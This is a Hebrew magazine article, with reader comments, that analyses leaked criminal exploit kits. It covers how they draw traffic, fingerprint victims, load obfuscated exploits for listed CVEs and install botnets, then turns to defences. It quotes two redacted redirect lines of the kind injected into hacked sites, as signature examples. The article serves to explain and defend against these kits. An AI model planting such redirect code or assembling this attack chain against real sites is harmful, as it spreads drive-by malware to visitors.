פשיעה קיברנטית: מבט מבפנים

מבט אל תוך עולם ה-Cyber Crime באמצעות ערכות פריצה למכירה שהופצו לאחרונה ומשמשות את ארגוני הפשיעה בעולם

תמונה: flickr, cc-by, ssoosay

עולם הפשיעה המכוון (“סייבר-פשע”) צובר תאוצה בשנים האחרונות, את זה אפשר לראות בעזרת קריאת דו”חות ומעקב פשוט אחר רשתות ה-Botnets, השתתפות בכל מיני פורומים העוסקים בקנייה ומכירה מחתרתיים וקריאת חדשות באתרי מחשבים מזדמנים. ארגוני פשיעה מחוץ לעולם הסייבר התחילו להבין כבר מלפני די הרבה זמן שניתן לנצל את העולם הוירטואלי כדי להרוויח כסף, והרבה ממנו, ובו, בניגוד לעולם שבחוץ, אין צורך לרדת לשטח, ללכלך את הידיים או לסכן את החיים.

צבא זומבים

אם עד לפני מספר שנים ארגוני פשיעה קיברנטים היו יוצרים צבאות זומבים, ומוכרים את המידע על אותם מחשבים, או את הנגישות למחשבים עצמם תמורת דולרים בודדים, כיום כבר ניתן לראות שהרבה מהגישה הזאת,שהתחילת בסביבות 2006, השתנתה כמעט לגמרי. במקום להדביק את המחשבים ולמכור אותם, כבר ניתן לקנות ערכות “עשה זאת בעצמך”, מדובר בתוכנות, בדרך כלל פשוטות להתקנה המאפשרות למשתמשים שהם לא בעלי רקע טכני גבוה להתקין ולפרוץ באופן אוטומטי למשתמשים תמימים בכדי להתקין עליהם (בדרך כלל) Bot-Nets שלהם, וכך, במקום לקנות מחשבים בודדים- ליצור צבא זומבים משל עצמם.

כיום קיימות מספר ערכות מסוג זה למכירה, הסכומים נעים בין מאות בודדות של דולרים ויכולים להגיע גם לאלפים, וכל זה לא כולל עדכונים שוטפים – כגון עדכונים למנגנון ההסוואה של הערכה מפני תוכנות האנטי-וירוס השונות, עדכונים לאקספלויטים השונים המתפרסמים עם הזמן ותמיכה של הערכה בהם.

לאחרונה, דלפו ערכות “Blackhole ExploitKit” (גרסא 1.02), “Crimepack” (גרסא 3.1.3.) ועוד 26 ערכות שונות כאלה לרשת האינטרנט ככל הנראה בכדי לנסות לפגוע במכירות של היוצרים שלהם, עובדה המאפשרת לנו להכיר קצת יותר מקרוב את העולם הזה.

בכתבה זו אנסה להציג את העולם הזה דרך ניתוח כללי ופרטני של הערכות הללו.

הערכות הללו הן מוצרים לכל דבר, ואחד הדגשים בהן הוא פשטות ההפעלה – בעזרת ממשקים נוחים מאוד ניתן להתקין, לשלוט, לתפעל ולראות את הנתונים עד כה והעדכונים הקיימים. לפני שנכנס לעומק העניין, אציג מספר תמונות להמחשה:

 

שלב ראשון – השגת תעבורה

גם אם רכשנו ערכה עם מימושים של מספר רב של חולשות רלוונטיות – בכדי לנצל אותה, אנחנו חייבים להפנות אליה גולשים:

  • נוכל לעשות זאת על-ידי הקמת אתרים פיקטיביים שאותם נדאג לעדכן, באופן ידני או באופן אוטומטי, אשר במקביל לתוכן רלוונטי שיוצג לקורבן, בדרך כלל יכללו גם עמודים שיציגו מידע הנשלף מ-RSS של אתרי חדשות וכו’ במסגרתם יופנה הגולש (מבלי ידיעתו) לעמודים בעלי אופי זדוני, אתרים כגון בלוגים, אתרים סטטיים, אתרי מראה של אתרים אחרים וכו’.

    • היתרון בטכניקה הזאת היא שמדובר באתר פרטי שלנו, ואולי אף שרת פרטי שלנו, כך שכל עוד הוא לא נכנס לכל שירותי ה-“Safe-Browsing” אין לנו סיבה לפחד שהוא יחשף.
    • החסרון הוא שאנו נהיה חייבים לדאוג לתעבורה מתמדת אליו. כמובן שבשביל זה נוכל להשתמש בכל מיני שירותי Black SEO כגון “SEO-Poisoning” בכדי לדאוג לכך שהוא יופיע בתוצאות גבוהות במנועי החיפוש.

  • נוכל לעשות זאת על-ידי פריצה לאתרים פופולארים והשתלת קוד מפנה (Redirect Code), שיפנה את הגולשים באופן בלתי מורגש (כגון הפנייה בתוך IFrame בלתי נראה, או ביצוע Include של קובץ JS זדוני וכו’), וכך נוכל “להרוויח” את התעבורה של אותו אתר מבלי הצורך לדאוג לפרסום של האתר או איסוף התוכן.

    • היתרון בשיטה הנ”ל הוא כאמור: אין צורך לדאוג לתוכן שיופיע באתר או לתעבורה אליו – אנחנו “ניזונים” מתעבורה של האתר עליו התלבשנו.

    • החסרון בשיטה הנ”ל הוא שמפני שמדובר באתר שלא שייך לנו, קיים סיכוי, וככל שעולה הפופולאריות של האתר כך גם עולה הסיכוי – שיעלו על אותו קוד ששתלנו ויסירו אותו. הדבר מסוכן יותר כי סביר להניח כי גם ידווחו עלינו – וכך נגיע מהר מאוד למסדי הנתונים של שירותי ה-“Safe Browsing”. בנוסף לכל זה – בכדי לממש את השיטה הנ”ל, אנו מוכרחים שיהיה לנו את הידע בדרוש בכדי לפרוץ לאתר עליו אנו מעוניינים להתלבש.

  • נוכל לעשות זאת על-ידי שימוש בשירותי ספאם (או שימוש בצבא זומבים שכבר יש לנו בכדי לשלוח ספאם) אשר יפנה את הקורבנות לאתר שלנו במחשבה ש-“הם בדיוק הגולש האלף ולכן מגיע להם לזכות בסמארטפון” או כל סיבה כזאת או אחרת. מדובר כאן בספאם לכל דבר, ולכן ההיתרונות או החסרונות בשיטה הנ”ל די ברורים.

    • היתרון: מדובר בשיטה זולה מאוד, קנייה של מסד נתונים המכיל מאות אלפי כתובות אימייל לצורי ספאם היא לא פעולה יקרה כל כך.

    • החסרון: מדובר בספאם, תופעה שעקב המודעות הגוברת אליה בשנים האחרונות, ומסנני הספאם המותקנים בשרתי הדוא”ל הפופולאריים נעשתה כמעט ולא אפקטיבית.

  • נוכל לעשות זאת על-ידי שימוש בטכניקה שלאחרונה גובר השימוש בה: “Malvertising“. מדובר בפלטפורמות להצגת פרסומות רלוונטיות, אם זה שימוש ב-Google ads או במנועי פרסום אוטומטיים אחרים אשר משתמשים בגופי צד-שלישי. בדרך כלל הפרסום שיוצג יהיה רלוונטי ותמים, ורק מדי פעם, במקרים שנחליט מראש – הפרסום יכלול תוכן אשר יפנה את הגולשים הצופים בפרסום לאתרים מפגעים. העובדה שלא מדובר בפעולה קבועה, והעבודה שמדובר בגופי צד-שלישי (לא האתר המפרסם, ולא הזכיין נחשפים לקוד הקצה המוצג לגולש) גורמות לפעולת האיתור של הקוד הזדוני להיות קשה ביותר וכמעט בלתי רלוונטיות. לפחות לא בארכיטקטורת פרסום הפרסומות המוצגת כיום.

שלב שני – סינון קורבנות פוטניצאלים

לאחר שהשגנו תעבורה לשרת עליו יש לנו הצורך לסנן אותם, הרי לא כל גולש הוא קורבן. איך אנחנו יכולים לדעת מי קורבן פוטנציאלי ומי לא? ובכן, על זה אחראי החלק השני שמרכיב את הערכה – וזה תלוי גם בארסנל החולשות שיש ברשותנו. אם אנו נתקלים בגולש, הגולש בדפדפן או משתמש בתוסף בעל חולשה שקיים לנו המימוש שלה בערכה שלנו – הרי יש לנו קורבן פוטנציאלי.

ברב הערכות כיום יש מנגנון לזיהוי קורבנות על פי ניתוח ה-User-Agent. נכון שקיימות ערכות “פרימיטיביות” שלא עושות שימוש במנגנון זה, ופשוט מנסות על הקורבן את וקטורי התקיפה אחד אחרי השני, אך כבר כמעט ולא ניתן למצוא אותן בשוק, וכל קבוצה שמכבדת את עצמה משתמשת במנגנון לזיהוי לקוח כזה או אחר. במאמר “Client Side Attacks”, שאותו הצגתי בגליון העשירי של המגזין, הצגתי מנגנון כזה, ולכן רק אצטט.

כמו שניתן להבין, ההצלחה של מתקפת Client-Side טמונה בהתאמה של וקטור התקיפה לאותו רכיב חשוף, דרכו אנו מעוניינים לחדור למחשב של הקורבן. שלא כמו במתקפות מבוססות Server-Side, בהן המטרה שלנו(השרת) סטטית- ואנו יכולים לבצע עליו פעולות קדם-התקפיות (כגון סקירה, ניתוח באנרים של שירותי רשת שונים וכן הלאה), כאן מדובר במטרות דינמיות לחלוטין, במידה ונטען וקטור תקיפה המבצע ניצול של חולשה על רכיב Windows Media Player תחת דפדפן Internet Explorer מגירסא 7 על קורבן אשר גולש עם Firefox תחת הפצת הלינוקס SuSE – לא משנה מה נעשה, “פספסנו” קורבן. לכן, בכדי למקסם את היקף הפגיעה שלנו, אנו חייבים לזהות את הגולשים באותו עמוד לפני שנבצע את טעינת וקטור התקיפה. זיהוי כזה ניתן לבצע במספר דרכים, אך הדרך הפשוטה והמהירה ביותר היא על ידי ניתוח מחרוזת ה-“User-Agent” שנשלחת באופן אוטומטי מהדפדפן (ניתן לראות מימוש יפה מאוד לכך בקישור הזה).

בעזרת שימוש במנגנון זיהוי – לקוח שכזה, לפני ביצוע המתקפה, אנו יכולים למקסם את מספר ההתקפות המוצלחות שלנו. אגב, שימוש במנגנוני זיהוי-לקוח כאלה אפשר למצוא בהרבה מאוד אתרים – בכל הנוגע לעיצוב האתר וקסטומיזציה של פלט HTML.

לדוגמא, מחרוזת User-Agent יכולה להראות כך:

גם מבלי לחפור עמוק מדי במחרוזת, ניתן לראות כי בעזרתה אנו יכולים להבחין במספר רב של מאפיינים אשר יכולים לעזור לנו בעת זיהוי הקורבן. מספר דוגמאות:

  • המחרוזת “Mozilla/5.0” מאפשרת לנו לזהות כי מדובר ברכיב דפדפן המבוסס על ליבת Mozilla גירסא 5.0

  • המחרוזת “Windows” מאפשרת לנו לזהות את מערכת ההפעלה שעליה רץ רכיב הדפדפן.

  • המחרוזת “Windows NT 6.0” מאפשרת לנו לזהות כי מדובר במערכת ההפעלה Vista.

  • המחרוזת “like Gecko” מאפשרת לנו לזהות כי מדובר ברכיב דפדפן אשר משתמש במנוע פענוח מסוג Gecko של Mozilla.

  • המחרוזת “Chrome/5.0.375.55” מאפשרת לנו לזהות כי מדובר ברכיב דפדפן מסוג Chrome וגם את גירסתו כמובן.

במידה ונרצה לבצע בדיקה האם הקורבן מריץ רכיב פלאש או רכיב Java, המאפשרים הרצה של תכנים אלו, נוכל לבצע נסיונות הרצה על ידי שימוש בקודים מבוססי Try and Catch, המאפשרים לנו לבצע קוד ולקבל את השגיאה (במידה וקיימת) המוחזרת מהפלטפורמה. כך, בכדי לזהות האם הקורבן מריץ רכיב לפענוח Java, ניתן לבצע Try המריץ קוד אשר דורש המצאות של רכיב Java על מחשבו של הקורבן, ועל ידי פענוח ה-Catch שמוחזר אלינו ניתן לבצע טעינה של וקטור התקיפה (במידה והנסיון עלה בהצלחה) או בדיקה האם הקורבן מריץ רכיב פגיע אחר (במידה והנסיון עלה בכשלון) וכך, טעינה של וקטור תקיפה ספציפי על קורבנות שונים.

שלב שלישי – תקיפה

לאחר שהשגנו את התעבורה לאתר הזדוני שלנו, ואחרי שסיננו את הגולשים וזיהינו מי גולש באיזה דפדפן, מי מריץ פלאש ומי משתמש בתוספת כזאת או אחרת, מגיע השלב השלישי – טעינת וקטור התקיפה. וקטור התקיפה הוא החלק האלים ביותר במערכת, ואותו מנסים לחתום כלל מנגנוני האנטי-וירוסים. עד כאן, כלל הפעילות התרחשה ב-Server Side, כאן, כאשר מנסים לטעון את וקטור התקיפה הכל חייב להתרחש ב-Client Side. ועל הערכה לנסות להסתיר את התקיפה כמה שיותר.

במידה והתקיפה תזוהה על-ידי מנגנוני היוריסטיקה, ווקטור התקיפה ידליק נורה אדומה אצל חברות האנטי-וירוס, הוא ייחתם, ויופץ לכלל האנטי-וירוסים, וברגע זה, אותו הוקטור כבר לא יהיה אפקטיבי. לכן בהרבה ערכות קיים מנגנון ערפול (Obfuscation) הדואג לכך שהקוד יראה כמה שיותר שונה בכל תקיפה ותקיפה.

בנוסף, קיימים גם מנגנונים מבוססי “Fail-Safe”, לדוגמא: במידה והופנה אלינו קורבן המריץ דפדפן עם תוספת לקריאת PDF הפגיעה לחולשה מסויימת וקיים לנו המימוש אליה, בתחילה המנגנון האחראי על טעינת וקטורי התקיפה ינסה לטעון PDF קטן ותמים בכדי לוודא שהכל עובד כשורה, ורק לאחר קבלת האינדיקציה כי הכל פעל כשורה – יטען הוקטור הזדוני ויריץ את ה-Payload המיועד.

הכל תלוי כמובן בסוג הערכה בה משתמשים או ב”מסלול” או רכשנו את הערכה, אבל בכל המקרים – החלק הנ”ל הוא החלק אשר דורש עדכונים שותפים לשני המרכיבים העיקריים שבו:

  • ארסנל האקספלויטים שהוא כולל.

  • מנגנון הערפול לטעינת וקטורי התקיפה.

כאשר מתפרסם ניצול של חולשה חדשה הניתנת לניצול באופן של “Drive-By Attack”, יוצרי הערכה מוסיפים אותה ומפרסמים בפורומים שניתן לעדכן את הערכה ולהוסיף את האקספלויט החדש למאגר האקספלויטים הקיים בערכה שלנו, בדרך כלל כל בערכה כולל עד עשרות בודדות של אקספלויטים.

לדוגמא, ה-“Phoenix Exploit’s Kit” מגרסא 2.7 כוללת את המימושים לחולשות הבאות:

  • Windows Help and Support Center Protocol Handler Vulnerability – (CVE-2010-1885)

  • Integer overflow in the AVM2 abcFile parser in Adobe Flash Player – (CVE-2009-1869(

  • Integer overflow in Adobe Flash Player 9 – (CVE-2007-0071)

  • IEPeers Remote Code Execution – (CVE-2009-0806)

  • Internet Explorer Recursive CSS Import Vulnerability – (CVE-2010-3971)

  • PDF Exploit – collab. collectEmailInfo – (CVE-2007-5659)

  • PDF Exploit – util.printf – (CVE-2008-2992)

  • PDF Exploit – collab.geticon – (CVE-2009-0927)

  • PDF Exploit – doc.media.newPlayer – (CVE-2009-4324)

  • PDF Exploit – LibTIFF Integer Overflow – (CVE-2010-0188)

  • JAVA exploit added – Java for Business JRE Trusted Method Chaining Remote Code Execution Vulnerability – (CVE-2010-0840

הערכה “Eleonore Exploit Pack” בגרסא 1.3.2 כללה את המימושים לחולשות הבאות:

  • MDAC ActiveX Remote Code Execution for MSIE – (CVE-2006-0003)

  • MS009-02 MSIE Memory Corruption – (CVE-2009-0075)

  • compareTo Remote Code Execution for Firefox – (CVE-2005-2265)

  • JNO (JS navigator Object Code) for Firefox – (CVE-2006-3677)

  • MS06-006 Microsoft WMP Buffer Overflow for Firefox – (CVE-2006-0005)

  • Font tags escape function Memory Corruption for Firefox – (CVE-2009-2477)

  • Telnet URI Remote File overwrite for Opera – (CVE-2004-0473)

  • PDF collab.getIcon Stack-based Buffer overflow for all browser – (CVE-2009-0927)

  • PDF Util.Printf Stack-based Buffer overflow for all browser – (CVE-2008-2992)

  • PDF collab.collectEmailInfo Multiple buffer overflows for all browser – (CVE-2007-5659)

  • PDF Doc.media.newPlayer Use-after-free for all browser – (CVE-2009-4324)

  • Java calendar (ZoneInfo Untrusted applets) for all browser – (CVE-2008-5353)

קיימות גם ערכות המיועדות לתקוף מערכות הפעלה ספציפיות (קל לנחש איזו מטרה היא הפופולארית ביותר…), כמו הערכה “”Bleeding Life, של Black Hat Academy, שיועדה לתקיפת דפדפנים הרצים על מערכת ההפעלה Windows. היא כוללת שישה מימושים שונים, 4 לחולשות הקיימות בתוספים של Adobe ועוד 2 לחולשות בתוספי Java, החולשות הן:

  • PDF Util.Printf Stack-based Buffer overflow – (CVE-2008-2992)

  • PDF authplay.dll and AVM2 newfunction instruction Memory Corruption – (CVE-2010-1297)

  • PDF authplay.dll unspecified vectors Memory Corruption – (CVE-2010-2884)

  • PDF Exploit – LibTIFF Integer Overflow – (CVE-2010-0188)

  • JAVA GM_Song structure uncontrolled array index Remote Code Execution – (CVE-2010-0842)

  • JAVA “Unspecified vulnerability” in the New Java Plug-in component – (CVE-2010-3552)

כמו שניתן לראות, הערכות לא כוללות מספר מימושים רב של חולשות, והן גם לא אמורות לכלול זאת. המטרה היא לכלול את החולשות החזקות והעדכניות ביותר בכל גרסא בגרסא – כי סביר להניח שאם הותקן עדכון מסויים במערכת, גם העדכונים שקדמו לו הותקנו, במידה ונמצאה חולשה בדפדפן מסויים, אשר תקפה למספר גרסאות שונות ובכל גרסא יש צורך לממש את הניצול באופן שונה, יהיה ניתן למצוא מספר גרסאות מימוש לחולשה.

שלב רביעי – הPayload

בסופו של דבר המטרה מאחורי אותן הערכות על כל המימושים שלהן היא להריץ את ה-Payload של וקטור התקיפה על כמה שיותר קורבנות. ה-Payload הוא בדרך כלל בינארי של Botnet כזה או אחר, ניתן לראות Payloads של ZeuS, SpyEye, BredoLab, Mariposa ועוד רבים. מרגע שהקורבן נכנס לאתר עם התוכן הזדוני (לדוגמא: כנראה לאתר תמים אשר נפרץ והושתל בו קוד זדוני) ועד הרצת ה-Payload על מחשבו – לא צריכות לעבור יותר ממספר שניות, ומרגע זה – הוא יתפקד כזומבי לכל דבר. את ה-Botnets רוכשים בדרך כלל בנפרד מה-Exploit Pack, ומקנפגים בנפרד.

התמודדות

כמו שניתן להבין, מדובר בתעשיה גדולה מאוד ובאיום לא קטן כלל, רשויות החוק, ארגוני אינטרנט או תוכנה גדולים, חברות אבטחת מידע וחוקרי אבטחת מידע פרטיים מנסים הרבה זמן להלחם בתופעה. כיום לא קיים פתרון “קסם” ובדרך כלל הפתרונות לכל מקרה הוא נקודתי. אם מדובר בחקירה של ה-Botnet והחתמתו, או בנסיון לאתר את שרתי ה-C&C והשבתתם או כמובן – לנסות לאתר את השרתים עליהם מאוחסנות ה-Exploit Pack והסרתם משם. לא נכנס ונפרט על כלל התהליכים הנעשים אך נגע בתהליכים הקשורים ל-Exploit Packs. אז, כיצד ניתן לעצור את האיום הזה דרך הפגיעה באותן הערכות? קיימות מספר דרכים, נתחיל כאן דווקא מהסוף:

החתמת ה-Payloads

בסופו של דבר, לא מדובר ביותר מתולעת / וירוס / Rootkit כזה או אחר, חברות האנטי-וירוסים עובדות קשה בכדי לאתר ולחתום אותם, על ידי חקירה של הבינארי עצמו ניתן לבנות חתימה שבעזרתה יהיה ניתן לאתר מחשבים נגועים ולנקות אותם. מדובר בפתרון נקודתי בלבד – שהרי החולשה דרכה המחשב נפרץ לראשונה עדיין קיימת, ובעזרת שינוי של המאפיין החתום בבינארי – יהיה ניתן לעדכן את ה-Payloads בכל ה-Exploit Kits ובפעם הבאה שהמשתמש יכנס לאתר הנגוע – הוא יודבק שנית.

עדכון נקודות הכשל בדפדפן

במידה ואותר השרת עליו יושבת ה-Exploit-Pack ניתן לחקור את החולשות בהן וקטורי התקיפה משתמשים. לחברות כגון Microsoft או Google קיימות מחלקות שלמות שזהו תפקידן- לאתר חולשות שבהן נעשה שימוש “In-The-Wild”, להגדיר אותן, לנסות לאתר את מקורן ולשחרר עדכון שימנע את הניצול בעתיד. מדובר בפתרון הרבה פחות נקודתי, ובשילובו עם ניקוי המחשבים הנגועים אפשר להכאיב קשה לתעשיה הנ”ל, אך במציאות נמצאות עוד ועוד חולשות, כך שבמידה ותוקנה חולשה אחת על ידי ה-Vendor, אותם אירגונים משלמים כסף נוסף – רוכשים חולשות חדשות, מכניסים אותן ל-Exploit Pack וממשיכים להגדיל את צבא הזומבים שלהם.

החתמת וקטורי התקיפה

בנוסף לחקירת הבינארים עצמם, חברות האנטי-וירוס עושות ימים כלילות בכדי לאתר עוד ועוד Exploit Packs וניסיון להבין כיצד להחתים את מנגנוני ה-Obfuscation. לדוגמא, במידה ובכדי להפנות גולשים ל-Exploit Pack מסויימת, יש להכניס שורת קוד כגון:

<script src=”http://******/a.php?p=1241232451235123657445″>

או:

<iframe src=”http://******/in.php?a=QQkFBg0DBwYNAwwFEkcJBQcEAQINDQcGAw==”>

לאתר הפרוץ, ובפרמטר ה-“src” מוכנסת כתובת שניתן לחתום (אם ע”י שימוש במאגרי ה-Safe Browsing ואם ע”י החתמת מאפיינים שונים בשורת הכתובת) ניתן להתריע על נסיון ההפנייה הזדוני, ולחסום אותו בעזרת רכיבי “Web-Shield” שמובנים ברכיבי האנטי-וירוס השונים. כיום רכיבים אלה עדיין לא מפותחים מספיק ומנגנוני ההחתמה לא מספיק ספציפיים ובמקרים רבים ניתן לצפות ב-False Positive על מנגנוני פרסומות (שעושים שימוש באלמנטים זהים פחות או יותר בכדי להציג פרסומות), אך הרעיון הכללי הוא רעיון טוב ובעזרת פתרונות כאלו, גם אם בוצעה גלישה לאתר נגוע, עם דפדפן פגיע – ניתן יהיה לעצור את המתקפה.

כמובן שכותבי אותן ה-Exploit Pack לא עושים את החיים קלים ומנסים ליצור כתובות שיהיה ניתן לחתום אותן כמה שפחות (כגון מספר כתובות ושימוש בשמות משתנים רנדומאלים) ווקטורי תקיפה שישתנו בעת תקיפה לתקיפה (כגון שימוש במספר וקטורים שונים להרצת אותו האקספלויט).

זיהוי הערכות על השרתים

כיוון נוסף שניתן לתקוף את האיום הנ”ל הוא בעזרת זיהוי הערכות על השרתים ודיווח לחברות המספקות את אותם שטחי האחסון, אם בעזרת סריקה חיצונית ואם בעזרת סריקה מקומית.

סריקה חיצונית מתבצעת לרב על-ידי חברות האנטי-וירוס והיא פשוט שימוש ברכיבי Crawling שונים וניסיון לאיתור כתובות / תבניות או עמודים המוכרים כחלק מאותן ערכות –  ובמידה ונמצאו כתובות כאלה, איתור ודיווח על כך לחברה המאחסנת את אותה הערכה וכך להגיע להסרתה.

סריקה מקומית נעשת על ידי החברה המספקת את שירותי האיחסון- על ידי שימוש בתוכנות אנטי וירוס וקריאה בתוכן הקבצים עצמן (דבר שאינו אפשרי בעת ביצוע סריקה חיצונית) תוך כדי ניסיון לאיתור פקודות או מנגנוני ה-Obfuscation.
לדוגמא: עמודים רבים של Blackhole Exploit Kit ושל CRiMEPACK מתחילים בסגנון הנ”ל:

ורק לאחר מכן מגיע תוכן העמוד תחת אובפוסקציה:

כאשר הערכה מגיעה כך, סריקה של הקובץ בכדי לאתר פונקציות PHP “מועדות” תהיה כמעט ולא יעילה, הקוד עצמו נשאר לא קריא בדיסק ורק בזכרון של השרת מתפענח, כך שכל עוד מתבצעת סריקה סטטית של הקובץ על ידי תוכנת האנטי-וירוס הסיכוי לאיתור אפסי וחובה ליצור חתימה ייחודית לכל Exploit-Kit.

אולם, לאחר יצירת החתימה- איתור הקבצים הנ”ל יהיו מלאכה פשוטה, אומנם, אין אפשרות לחתום את ה-DATA, אבל את ה-“Decoder” (או ה-“Loader”) לא תהיה בעיה לחתום- וכך לאתר את הערכה על שטח האחסון.

במקרים רבים הדבר אכן עוזר, אך ישנן חברות אחסון (בדרך כלל במדינות כגון רוסיה, סין ומדינות דרום אמריקה) אשר בכוונה תחילה מיעדות את ערכות אחסון שלהם לארגונים המבצעים שימוש בשירותיה לצרכים בעלי אופי כזה ודומה- שלא יתקינו תוכנות “שמסכנות” את אותן הערכות, ובמידה וחברה כזאת או אחרת תפנה אליהם, ותדווח להם שמסריקה חיצונית נמצאו עדויות לכך שמדומיין מסויים מתבצעת פעילות שאינה חוקית – הן יעשו את המאמצים הגדולים ביותר להקשות על אותו גורם במהלך החקירה ולטרפד את סגירת החשבון.

סיכום

לפי איך שזה נראה “ערכות פריצה” או Exploits Packs ישארו כאן הרבה מאוד זמן, בייחוד מפני שהן מכניסות הרבה כסף לארגוני פשיעה בעולם. כמו שראינו, עדיין אין פתרון חד משמעי לגביהן. רשויות החוק בעולם, בעזרת חברות אבטחת מידע שונות עושות הרבה מאוד בכדי לעצור את ארגוני הפשיעה באינטרנט, אך עד שהאינטרנט יהיה מקום בטוח לגלישה – חשוב מאוד לגלוש באופן מושכל, להיות חשדניים ולא לבטוח בשום דבר שזז.


הכתבה נכתבה על-ידי אפיק קסטיאל ופורסמה במקור במגזין Digital Whisper, גיליון #26

 

Digital Whisper

Digital Whisper הוא מגזין חודשי שמפורסם במטרה לספק לקורא הישראלי תוכן מקצועי בעברית עם דגש על נושאים כגון אבטחת מידע והאקניג, Reverse Engineering, סטגנוגרפיה, קריפטוגרפיה, קריפטו-אנליזה, חקר וניתוח קוד זדוני, פיתוח Rootkits וניתוח מנגנוני Anti-Reversing.

הגב

3 תגובות על "פשיעה קיברנטית: מבט מבפנים"

avatar
Photo and Image Files
 
 
 
Audio and Video Files
 
 
 
Other File Types
 
 
 

* היי, אנחנו אוהבים תגובות!
תיקונים, תגובות קוטלות וכמובן תגובות מפרגנות - בכיף.
חופש הביטוי הוא ערך עליון, אבל לא נוכל להשלים עם תגובות שכוללות הסתה, הוצאת דיבה, תגובות שכוללות מידע המפר את תנאי השימוש של Geektime, תגובות שחורגות מהטעם הטוב ותגובות שהן בניגוד לדין. תגובות כאלו יימחקו מייד.

סידור לפי:   חדש | ישן | הכי מדורגים
אלכס
Guest

מעולה! סיכום יפה ועדכני, כל הכבוד! נהנתי :)

ניר
Guest

עוקב אחרי החברה האלה כבר זמן מה, פשוט כתבות מצוינות!

יוסי מזרחי
Guest

כתבה מעולה! כל הכבוד

wpDiscuz

תגיות לכתבה: